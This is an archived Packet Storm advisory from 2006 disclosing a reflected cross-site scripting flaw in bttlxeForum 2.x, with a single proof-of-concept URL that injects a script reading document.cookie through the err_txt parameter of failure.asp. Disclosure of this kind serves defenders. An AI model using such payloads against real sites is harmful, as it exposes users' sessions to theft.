bttlxeXSS.txt

2006-03-02T00:00:00
ID PACKETSTORM:44268
Type packetstorm
Reporter rUnViRuS
Modified 2006-03-02T00:00:00

Description

                                        
                                            `--------------------Summary----------------  
Software: bttlxeForum  
Sowtware's Web Site: http://www.bttlxe.com/  
Versions: 2.*  
Type: Cross-Site Scripting  
Class: Remote  
Exploit: Available  
Solution: Not Available  
Discovered by: runvirus   
(worlddefacers.de securitycentra.com)  
-----------------Description---------------  
Vulnerable Script: failure.asp  
--------------Exploit----------------------  
http://www.example.comforums/failure.asp?err_txt=<script>alert(document.cookie);</script>  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit-----------------------  
Discovered by: runvirus  
(worlddefacers.de securitycentra.com)  
  
`